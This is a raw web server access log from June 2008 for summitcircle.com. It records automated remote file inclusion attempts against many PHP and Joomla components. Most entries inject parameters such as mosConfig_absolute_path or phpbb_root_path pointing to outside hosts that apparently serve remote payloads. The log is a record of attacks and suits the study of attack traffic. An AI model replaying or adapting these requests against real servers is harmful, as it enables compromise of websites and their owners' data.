202.169.224.66 - - [30/Jun/2008:05:52:19 -0700] "GET /logs/access_080121.log/lang.php?subpage=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
202.169.224.66 - - [30/Jun/2008:05:52:21 -0700] "GET /logs/lang.php?subpage=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
66.98.208.86 - - [30/Jun/2008:05:52:40 -0700] "GET ///ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://mx-skane.net/images/vnc/safe.txt HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.summitcircle.com"
66.98.208.86 - - [30/Jun/2008:05:52:50 -0700] "GET /logs///ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://mx-skane.net/images/vnc/safe.txt HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.summitcircle.com"
219.94.129.31 - - [30/Jun/2008:05:52:50 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://pwd.roietceo.net/Newsimage/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
216.17.101.237 - - [30/Jun/2008:05:53:16 -0700] "GET /logs/access_080406.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
202.63.101.163 - - [30/Jun/2008:05:54:30 -0700] "GET /logs/access_071015.log/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://210.60.110.116/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
87.230.35.101 - - [30/Jun/2008:05:54:44 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
201.252.14.147 - - [30/Jun/2008:05:55:08 -0700] "GET /logs/access_080406.log//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
201.252.14.147 - - [30/Jun/2008:05:55:08 -0700] "GET //com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
201.252.14.147 - - [30/Jun/2008:05:55:08 -0700] "GET /logs//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
212.227.251.172 - - [30/Jun/2008:05:55:11 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
202.169.224.66 - - [30/Jun/2008:05:55:15 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
201.252.14.147 - - [30/Jun/2008:05:55:36 -0700] "GET /logs/access_080406.log//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
201.252.14.147 - - [30/Jun/2008:05:55:41 -0700] "GET /logs//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
74.6.17.181 - - [30/Jun/2008:05:57:01 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.summitcircle.com"
74.6.17.181 - - [30/Jun/2008:05:57:01 -0700] "GET /logs/?D=A HTTP/1.0" 200 10074 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.summitcircle.com"
202.63.101.163 - - [30/Jun/2008:05:57:09 -0700] "GET /logs/access_071029.log/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://210.60.110.116/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
88.255.236.6 - - [30/Jun/2008:05:57:09 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://easyshortsalenegotiation.com/includes/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
88.255.236.6 - - [30/Jun/2008:05:57:09 -0700] "GET //administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://easyshortsalenegotiation.com/includes/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
88.255.236.6 - - [30/Jun/2008:05:57:09 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://easyshortsalenegotiation.com/includes/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
87.230.35.101 - - [30/Jun/2008:05:57:10 -0700] "GET /logs/access_070924.log/index.php?s=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
87.230.35.101 - - [30/Jun/2008:05:57:10 -0700] "GET /index.php?s=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
87.230.35.101 - - [30/Jun/2008:05:57:10 -0700] "GET /logs/index.php?s=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
201.218.50.7 - - [30/Jun/2008:05:58:05 -0700] "GET /logs/access_070917.log//components/com_simpleboard/image_upload.php?sbp=http://evro-set.ru/modules/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
201.218.50.7 - - [30/Jun/2008:05:58:05 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://evro-set.ru/modules/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
201.218.50.7 - - [30/Jun/2008:05:58:08 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://evro-set.ru/modules/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
209.250.234.226 - - [30/Jun/2008:05:58:50 -0700] "GET /logs/access_070826.log/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
209.250.234.226 - - [30/Jun/2008:05:58:50 -0700] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
209.250.234.226 - - [30/Jun/2008:05:58:50 -0700] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
67.228.115.66 - - [30/Jun/2008:05:58:58 -0700] "GET /logs/access_071029.log//modules/vwar/admin/admin.php?vwar_root=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
67.228.115.66 - - [30/Jun/2008:05:58:59 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
67.228.115.66 - - [30/Jun/2008:05:58:59 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
201.218.50.7 - - [30/Jun/2008:05:59:00 -0700] "GET /logs/access_071022.log//components/com_simpleboard/image_upload.php?sbp=http://evro-set.ru/modules/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
201.218.50.7 - - [30/Jun/2008:05:59:01 -0700] "GET /logs/access_071112.log//components/com_simpleboard/image_upload.php?sbp=http://evro-set.ru/modules/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
216.118.97.213 - - [30/Jun/2008:05:59:45 -0700] "GET /logs/access_070826.log/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
216.118.97.213 - - [30/Jun/2008:05:59:45 -0700] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
216.118.97.213 - - [30/Jun/2008:05:59:45 -0700] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
87.230.35.101 - - [30/Jun/2008:06:00:21 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
87.230.35.101 - - [30/Jun/2008:06:00:22 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
201.218.50.7 - - [30/Jun/2008:06:00:25 -0700] "GET /logs/access_071008.log//components/com_simpleboard/image_upload.php?sbp=http://evro-set.ru/modules/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
77.221.157.210 - - [30/Jun/2008:06:00:39 -0700] "GET /logs/access_080121.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.wisdomteachers.com/audioblog/flashaudio/07feb/blid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
72.29.87.105 - - [30/Jun/2008:06:02:12 -0700] "GET /logs/access_071224.log/index.php?option=com_facileforms&Itemid=&mosConfig_absolute_path=http://fightersoft.ro/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
69.89.31.88 - - [30/Jun/2008:06:02:35 -0700] "GET //stats/modules/My_eGallery/index.php?basepath=http://claro3g.freehostia.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "summitcircle.com"
121.124.127.40 - - [30/Jun/2008:06:03:37 -0700] "GET /logs/access_071029.log/errors.php?error=http://www.concurs.org/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
121.124.127.40 - - [30/Jun/2008:06:03:38 -0700] "GET /errors.php?error=http://www.concurs.org/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
121.124.127.40 - - [30/Jun/2008:06:03:38 -0700] "GET /logs/errors.php?error=http://www.concurs.org/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
62.2.100.138 - - [30/Jun/2008:06:04:04 -0700] "GET /logs/access_070826.log/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
62.2.100.138 - - [30/Jun/2008:06:04:04 -0700] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
62.2.100.138 - - [30/Jun/2008:06:04:05 -0700] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
216.245.192.26 - - [30/Jun/2008:06:04:12 -0700] "GET /logs/access_080127.log/index.php?option=com_facileforms&Itemid=&mosConfig_absolute_path=http://www.classvogue.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
216.245.192.26 - - [30/Jun/2008:06:04:12 -0700] "GET /index.php?option=com_facileforms&Itemid=&mosConfig_absolute_path=http://www.classvogue.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
216.245.192.26 - - [30/Jun/2008:06:04:12 -0700] "GET /logs/index.php?option=com_facileforms&Itemid=&mosConfig_absolute_path=http://www.classvogue.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
69.89.31.88 - - [30/Jun/2008:06:04:25 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://claro3g.freehostia.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
64.105.33.158 - - [30/Jun/2008:06:04:46 -0700] "GET //?mosConfig_absolute_path=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "summitcircle.com"
64.105.33.158 - - [30/Jun/2008:06:04:46 -0700] "GET //?mosConfig_absolute_path=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "summitcircle.com"
216.245.192.26 - - [30/Jun/2008:06:05:10 -0700] "GET /logs/access_080114.log/index.php?option=com_facileforms&Itemid=&mosConfig_absolute_path=http://www.classvogue.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
212.227.251.172 - - [30/Jun/2008:06:05:54 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
87.230.35.101 - - [30/Jun/2008:06:05:55 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
87.230.35.101 - - [30/Jun/2008:06:05:55 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
194.150.224.92 - - [30/Jun/2008:06:06:19 -0700] "GET /logs/access.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://itmovement.com/taxy/templates_nogui/editor/_samples/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
194.150.224.92 - - [30/Jun/2008:06:06:19 -0700] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://itmovement.com/taxy/templates_nogui/editor/_samples/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
194.150.224.92 - - [30/Jun/2008:06:06:19 -0700] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://itmovement.com/taxy/templates_nogui/editor/_samples/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
64.105.33.158 - - [30/Jun/2008:06:06:57 -0700] "GET /logs/access_071015.log//language/lang_english/lang_main_album.php?phpbb_root_path=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.105.33.158 - - [30/Jun/2008:06:06:57 -0700] "GET /logs/access_071015.log//language/lang_english/lang_main_album.php?phpbb_root_path=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.105.33.158 - - [30/Jun/2008:06:06:57 -0700] "GET /logs/access_071001.log//?mosConfig_absolute_path=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.105.33.158 - - [30/Jun/2008:06:06:57 -0700] "GET /logs/access_071001.log//?mosConfig_absolute_path=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.105.33.158 - - [30/Jun/2008:06:07:06 -0700] "GET //?mosConfig_absolute_path=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.105.33.158 - - [30/Jun/2008:06:07:06 -0700] "GET //?mosConfig_absolute_path=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.summitcircle.com"
69.89.31.88 - - [30/Jun/2008:06:07:14 -0700] "GET //stats/modules/My_eGallery/index.php?basepath=http://claro3g.freehostia.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
64.105.33.158 - - [30/Jun/2008:06:07:14 -0700] "GET /logs//?mosConfig_absolute_path=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 200 10095 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.105.33.158 - - [30/Jun/2008:06:07:14 -0700] "GET /logs//?mosConfig_absolute_path=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 200 10095 "-" "libwww-perl/5.805" "www.summitcircle.com"
201.218.50.7 - - [30/Jun/2008:06:07:53 -0700] "GET /logs/access_070903.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://evro-set.ru/modules/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
201.218.50.7 - - [30/Jun/2008:06:07:53 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://evro-set.ru/modules/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
201.218.50.7 - - [30/Jun/2008:06:07:53 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://evro-set.ru/modules/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
201.218.50.7 - - [30/Jun/2008:06:08:51 -0700] "GET /logs/access.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://evro-set.ru/modules/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
201.252.14.147 - - [30/Jun/2008:06:08:54 -0700] "GET /logs/access_080406.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
201.252.14.147 - - [30/Jun/2008:06:08:54 -0700] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
201.252.14.147 - - [30/Jun/2008:06:08:55 -0700] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
121.124.127.40 - - [30/Jun/2008:06:09:05 -0700] "GET /logs/access.log/errors.php?error=http://www.concurs.org/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
216.118.97.213 - - [30/Jun/2008:06:09:34 -0700] "GET /logs/access_080211.log/includes/footer.php?systempath=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
216.118.97.213 - - [30/Jun/2008:06:09:34 -0700] "GET /includes/footer.php?systempath=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
216.118.97.213 - - [30/Jun/2008:06:09:34 -0700] "GET /logs/includes/footer.php?systempath=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
82.194.70.164 - - [30/Jun/2008:06:09:37 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://74.55.118.130/~consult/shop/classes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
82.194.70.164 - - [30/Jun/2008:06:09:37 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://74.55.118.130/~consult/shop/classes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
82.194.70.164 - - [30/Jun/2008:06:09:38 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://74.55.118.130/~consult/shop/classes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
216.118.97.213 - - [30/Jun/2008:06:09:43 -0700] "GET /logs/access_080406.log/includes/footer.php?systempath=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
209.250.234.226 - - [30/Jun/2008:06:09:44 -0700] "GET /logs/access_071126.log/modules/Neos_Chronos/header.php?base_folder=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
209.250.234.226 - - [30/Jun/2008:06:09:44 -0700] "GET /modules/Neos_Chronos/header.php?base_folder=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
209.250.234.226 - - [30/Jun/2008:06:09:44 -0700] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
209.250.234.226 - - [30/Jun/2008:06:09:44 -0700] "GET /logs/access_080414.log/modules/Neos_Chronos/header.php?base_folder=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
209.250.234.226 - - [30/Jun/2008:06:09:44 -0700] "GET /modules/Neos_Chronos/header.php?base_folder=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
209.250.234.226 - - [30/Jun/2008:06:09:44 -0700] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
216.118.97.213 - - [30/Jun/2008:06:09:44 -0700] "GET /logs/access_071126.log/modules/Neos_Chronos/header.php?base_folder=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
216.118.97.213 - - [30/Jun/2008:06:09:44 -0700] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
216.118.97.213 - - [30/Jun/2008:06:09:44 -0700] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
216.118.97.213 - - [30/Jun/2008:06:09:45 -0700] "GET /logs/access_080414.log/modules/Neos_Chronos/header.php?base_folder=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
216.118.97.213 - - [30/Jun/2008:06:09:45 -0700] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
